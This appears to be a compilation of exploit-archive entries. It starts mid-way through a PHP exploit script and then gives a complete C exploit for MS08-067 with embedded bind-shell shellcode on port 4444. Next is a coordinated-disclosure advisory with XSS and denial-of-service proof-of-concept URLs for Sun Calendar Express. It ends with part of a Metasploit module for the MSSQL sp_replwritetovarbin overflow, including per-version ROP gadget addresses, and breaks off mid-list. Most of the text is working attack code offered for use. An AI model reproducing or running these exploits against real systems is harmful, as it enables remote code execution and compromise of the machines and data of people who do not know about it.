if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}
IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-06]
Polymorphours/MS Windows Server Service Code Execution Exploit (MS08-067) ( windows)
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
// milw0rm.com [2008-11-12]
Core Security/Sun Calendar Express Web Server (DoS/XSS) Multiple Remote Vulns ( multiple)
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in Sun Calendar Express Web Server
1. *Advisory Information*
Title: Multiple vulnerabilities in Sun Calendar Express Web Server
Advisory ID: CORE-2009-0108
Advisory URL: http://www.coresecurity.com/content/sun-calendar-express
Date published: 2009-03-31
Date of last update: 2009-03-31
Vendors contacted: Sun Microsystems
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS), Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34150, 34152, 34153
CVE Name: N/A
3. *Vulnerability Description*
Several vulnerabilities have been discovered in Sun Java System Calendar
Express web server [1]. First, an attacker can crash the web server
creating a Denial of Service condition by simply requesting certain URL
twice. Second, several Cross-site scripting vulnerabilities [2], [3]
were found in the following files/urls:
1. 'https://<server>:3443/login.wcap'
2. 'https://<server>:3443/command.shtml'
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information to the user (i.e.
credentials). This vulnerability occurs when user-supplied data is
displayed without encoding.
4. *Vulnerable packages*
. Sun ONE Calendar Server 6.0
. Sun Java System Calendar Server 6 2004Q2
. Sun Java System Calendar Server 6 2005Q1
. Sun Java System Calendar Server 6 2005Q4
. Sun Java System Calendar Server 6.3
. Sun Java System Calendar Server 6.3-7.01 (built Feb 20 2008)
5. *Vendor Information, Solutions and Workarounds*
Sun has published patches and a Sun alert for these vulnerabilities. The
Sun alert will be available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-256228-1
6. *Credits*
These vulnerabilities were discovered by the SCS team from Core Security
Technologies.
7. *Technical Description / Proof of Concept Code*
Cross-Site Scripting (commonly referred to as XSS) bugs arise from a web
application's improper encoding or filtering of input obtained from
untrusted sources. These bugs allow an attacker to inject malicious tags
and/or script code that is later executed in the context of a web
browser when the user accesses the vulnerable web site. The injected
code then takes advantage of the trust relationship between the web
browser and the vulnerable web application. Attacks that exploit XSS
bugs are targeted at users of a vulnerable web application rather than
at the application itself, although one could say that since the XSS
vulnerability in the web application created the vector that allows the
compromise of several of its user's web browsers, the web application
itself originated the problem. The term 'cross-site scripting' is also
sometimes used in a broader-sense referring to different types of
vulnerabilities that lead to attacks that inject scripting code into
client applications from sources that would not be trusted during script
execution runtime if the corresponding bug did not exist. For additional
information, please look at the references [2], [3], [4], [5] and [6].
7.1. *Vulnerability #1 - XSS (BID 34152)*
Cross-site scripting vulnerabilities were found in the following file/url:
/-----------
https://<server>:3443/login.wcap
- -----------/
This is the login page of the Sun Java System Calendar Express Web
application; although the affected URL is originally accessed through a
POST request, this vulnerability can be exploited both with a GET and
with a POST request.
Using the following variables:
/-----------
Fmt-out
- -----------/
the contents of the variables previously mentioned are not being
encoded at the time of using them in HTML output, therefore allowing an
attacker who controls their content to insert javascript code.
The following code is a proof of concept of this flaw:
/-----------
https://<server>:3443/login.wcap?calid=&calname=&date=&fmt-out=<script>alert(document.cookie)</script>&view=&locale=&tzid=&test=1229606492214&user=test&password=test
- -----------/
*Note:* Fields previously listed were verified for this type of issue.
Other fields on this or other pages for this application could be also
vulnerable to the same type of issue.
7.2. *Vulnerability #2 - XSS (BID 34153)*
Cross-site scripting vulnerabilities were found in the following file/url:
/-----------
https://<server>:3443/command.shtml
- -----------/
Using the following variables:
/-----------
date
- -----------/
the contents of the 'date' variable are not being encoded at the time
Of using them in HTML output, therefore allowing an attacker who
controls their content to insert javascript code.
The following code is a proof of concept of this flaw:
/-----------
https://<server>:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1
- -----------/
*Note:* Fields previously listed were verified for this type of issue.
Other fields on this or other pages for this application could be also
vulnerable to the same type of issue.
7.3. *Vulnerability #3 - DoS (BID 34150)*
An attacker can crash the Sun Java System Calendar Express web server
creating a Denial of Service condition by simply requesting certain URL
twice. Go to a browser and enter the following URL:
/-----------
https://<server>:3443/?tzid=crash
- -----------/
where 'crash' can in fact be any string with alphabetic characters. The
first time you will receive an error. If at this point you access again
'https://<server>:3443/', the web server will still be operational.
Then, access again the URL 'https://<server>:3443/?tzid=crash' that will
crash the server again but this time the web server will stop responding
permanently until the administrator restarts the process.
8. *Report Timeline*
. 2009-01-09: Core Security Technologies notifies Sun Security
Coordination Team of the vulnerability, setting the estimated
publication date of the advisory to Feb 2nd. Technical details provided
in an encrypted document.
. 2009-01-09: The vendor acknowledges reception of the report and asks
Core to postpone publication of the security advisory in order to have
enough time to investigate and fix the bugs. Vendor requests GPG key of
Core's security Advisories team.
. 2009-01-12: Core agrees to postpone publication of the security
advisory but asks the vendor for a feedback of the vendor's engineering
team as soon as possible in order to coordinate the release date of
fixes and security advisories.
. 2009-01-21: Core asks Sun for an estimated date for the release of
patches and fixes.
. 2009-01-21: Sun Security Coordination Team notifies Core that the
vendor's engineering team is hoping to have patches released sometime
near the end of February or the beginning of March. The time-frame is
tentative due to the vendor's QA testing process that includes testing
of all patches which may include fixes to bugs unrelated to those
reported by Core. Sun will issue a Sun Alert associated to these bugs
and would like to coordinate its publication date with that of Core's
security advisory.
. 2009-02-06: Core re-schedules the advisory publication date to Feb
25th. Updated timeline sent to the vendor requesting confirmation that
patches will be released by then.
. 2009-02-09: Sun Security Coordination team acknowledges previous email
from Core and indicates it has requested confirmation from the
engineering team that they are on track for release by the end of February.
. 2009-02-10: Vendor asks Core for the exact version and patch level of
the tested Calendar Express Web server package and provides the URL to
the latest released patch
(http://sunsolve.sun.com/search/document.do?assetkey=1-21-121657-32-1)
. 2009-02-10: Core sends requested information (output of csversion
command) and indicates that the bugs were found on release packages with
no additional patches installed.
. 2009-02-11: Sun security coordination team acknowledges email from
Core and indicates that it will pass the information to the engineering
team.
. 2009-02-16: The vendor asks Core to delay the advisory publication
until the end of March, in order to finish a rigorous process of
internal testing. Sun also indicates that the DoS vulnerability had been
indentified previously as Sun bug 6728790 and fixed in patches already
released: Patches 121657-30 (Solaris SPARC), 121658-30 (Solaris x86) and
121659-30 (Linux) and also in the later revisions of these patches.
. 2009-02-16: Core re-schedules the advisory publication date to March
30th. Core indicates that it would appreciate further technical details
about the flaws from the vendors engineering team.
. 2009-02-17: Vendor acknowledges previous email.
. 2009-03-17: Core reminds the vendor that publication of the advisory
is scheduled for March 30th. Core also requests updated information
about the development and release of fixed versions.
. 2009-03-23: Vendor estimates that it is on track to have the fix ready
for publication at the end of the month, March 30th.
. 2009-03-23: Core acknowledges reception and requests a list of
affected versions and a link to fixed versions and any additional
information for Sun customers.
. 2009-03-25: Vendor informs that fixes will probably be released on
March 30th, and provides a list of affected products and versions.
. 2009-03-30: Core requests confirmation that patches will be released.
. 2009-03-31: Vendor confirms the release of patches and provides a link
to the Sun alert.
. 2009-03-31: The advisory CORE-2009-0108 is published.
9. *References*
[1] http://www.sun.com/software/products/calendar_srvr/
[2] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html.
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
11. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
# milw0rm.com [2009-03-31]
metasploit/Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection ( windows)
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::MSSQL_SQLI
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.
Microsoft patched this vulnerability in SP3 for 2005 without any public
mention.
This exploit smashes several pointers, as shown below.
1. pointer to a 32-bit value that is set to 0
2. pointer to a 32-bit value that is set to a length influcenced by the buffer
length.
3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,
this value is referenced with a displacement of 0x38. For MSSQL 2005, the
displacement is 0x10. The address of our buffer is conveniently stored in
ecx when this instruction is executed.
4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
a displacement of 4. This pointer is not used by this exploit.
This particular exploit replaces the previous dual-method exploit. It uses
a technique where the value contained in ecx becomes the stack. From there,
return oriented programming is used to normalize the execution state and
finally execute the payload via a "jmp esp". All addresses used were found
within the sqlservr.exe memory space, yielding very reliable code execution
using only a single query.
NOTE: The MSSQL server service does not automatically restart by default. That
said, some exceptions are caught and will not result in terminating the process.
If the exploit crashes the service prior to hijacking the stack, it won't die.
Otherwise, it's a goner.
},
'Author' =>
[
'jduck', # MS09-004 base exploit
'Rodrigo Marcos' # SQL Injection mods
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11730 $',
'References' =>
[
[ 'OSVDB', '50589' ],
[ 'CVE', '2008-5416' ],
[ 'BID', '32710' ],
[ 'MSB', 'MS09-004' ],
[ 'URL', 'http://www.milw0rm.com/exploits/7501' ],
[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "", # bad bytes get encoded!
'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff",
'DisableNops' => true
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# auto targeting!
[ 'Automatic', { } ],
#
# Individual targets
#
[
# Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
# Aug 6 2000 00:57:48
'MSSQL 2000 / MSDE SP0 (8.00.194)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]
'Disp' => 0x08, # displacement on call [ecx+disp] used
'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret
'Popped' => 0x4, # byte count popped in above (before ret)
'Offset' => 0x28, # offset to the new stack!
'FixESP' => 0x0071f5fb, # advance esp to next ret (add esp,0x20 / ret)
'Ret' => 0x0041c9a2 # jmp esp
},
],
[
# Microsoft SQL Server 2000 - 8.00.384 (Intel X86)
# May 23 2001 00:02:52
'MSSQL 2000 / MSDE SP1 (8.00.384)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]
'Disp' => 0x34, # displacement on call [ecx+disp] used
'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
'Popped' => 0x8, # byte count popped in above (before ret)
'Offset' => 0x28, # offset to the new stack!
'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)
'Ret' => 0x004caa15 # jmp esp
},
],
[
# Microsoft SQL Server 2000 - 8.00.534 (Intel X86)
# Nov 19 2001 13:23:50
'MSSQL 2000 / MSDE SP2 (8.00.534)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]
'Disp' => 0x34, # displacement on call [ecx+disp] used
'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
'Popped' => 0x8, # byte count popped in above (before ret)
'Offset' => 0x28, # offset to the new stack!
'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)
'Ret' => 0x004ca984 # jmp esp
},
],
[
# Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
# Dec 17 2002 14:22:05
'MSSQL 2000 / MSDE SP3 (8.00.760)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]
'Disp' => 0x34, # displacement on call [ecx+disp] used
'ecx2esp' => 0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
'Popped' => 0x8, # byte count popped in above (before ret)
'Offset' => 0x28, # offset to the new stack!
'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)
'Ret' => 0x0043fa97 # jmp esp
},
],
[
# Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
# May 3 2005 23:18:38
'MSSQL 2000 / MSDE SP4 (8.00.2039)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]
'Disp' => 0x14, # displacement on call [ecx+disp] used
'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4
'Popped' => 0x4, # byte count popped in above (before ret)
'Offset' => 0x20, # offset to the new stack!
'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)
'Ret' => 0x0047c89d # jmp esp
},
],
[
# Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
# Oct 14 2005 00:33:37
'MSSQL 2005 SP0 (9.00.1399.06)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]
'Disp' => 0x50, # displacement on call [ecx+disp] used
'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret
'Popped' => 0x4, # byte count popped in above (before ret)
'Offset' => 0x20, # offset to the new stack!
'FixESP' => 0x0147deb7, # advance esp to next ret (add esp,0x10 / ret)
'Ret' => 0x0112c2c7 # jmp esp
},
],
[
# Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)
# Apr 14 2006 01:12:25
'MSSQL 2005 SP1 (9.00.2047.00)',
